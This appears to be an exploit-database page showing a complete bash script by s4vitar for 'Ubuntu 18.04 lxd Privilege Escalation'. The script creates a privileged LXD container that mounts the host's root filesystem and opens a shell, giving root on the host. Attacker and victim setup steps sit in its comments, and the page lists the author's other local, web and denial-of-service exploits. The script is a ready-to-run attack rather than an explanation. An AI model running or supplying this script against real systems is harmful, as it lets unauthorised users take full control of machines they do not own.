Become a patron and gain access to the dashboard, Schedule scans, API and Search patron
Author
s4vitar
Platform
linux
Release date
2019-06-10
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 | #!/usr/bin/env bash # ---------------------------------- # Authors: Marcelo Vazquez (S4vitar) # Victor Lasa (vowkin) # ---------------------------------- # Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine] # Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine] # Step 3: Run this script and you will get root [Victim Machine] # Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine function helpPanel(){ echo -e "\nUsage:" echo -e "\t[-f] Filename (.tar.gz alpine file)" echo -e "\t[-h] Show this help panel\n" exit 1 } function createContainer(){ lxc image import $filename --alias alpine && lxd init --auto echo -e "[*] Listing images...\n" && lxc image list lxc init alpine privesc -c security.privileged=true lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true lxc start privesc lxc exec privesc sh cleanup } function cleanup(){ echo -en "\n[*] Removing container..." lxc stop privesc && lxc delete privesc && lxc image delete alpine echo " [√]" } set -o nounset set -o errexit declare -i parameter_enable=0; while getopts ":f:h:" arg; do case $arg in f) filename=$OPTARG && let parameter_enable+=1;; h) helpPanel;; esac done if [ $parameter_enable -ne 1 ]; then helpPanel else createContainer fi |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2019-10-16 | "X.Org X Server 1.20.4 - Local Stack Overflow" | local | linux | s4vitar |
2019-06-14 | "CentOS 7.6 - 'ptrace_scope' Privilege Escalation" | local | linux | s4vitar |
2019-06-10 | "Ubuntu 18.04 - 'lxd' Privilege Escalation" | local | linux | s4vitar |
2019-03-15 | "NetData 1.13.0 - HTML Injection" | webapps | multiple | s4vitar |
2019-02-28 | "FTP Server 1.32 - Denial of Service" | dos | android | s4vitar |
2019-02-21 | "AirDrop 2.0 - Denial of Service (DoS)" | dos | android | s4vitar |
2019-02-21 | "ScreenStream 3.0.15 - Denial of Service" | dos | android | s4vitar |
2019-02-15 | "AirMore 1.6.1 - Denial of Service (PoC)" | dos | android | s4vitar |
2019-02-14 | "ApowerManager 3.1.7 - Phone Manager Remote Denial of Service (PoC)" | dos | android | s4vitar |
2019-02-11 | "AirDroid 4.2.1.6 - Denial of Service" | dos | android | s4vitar |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/46978/?format=json')
For full documentation follow the link above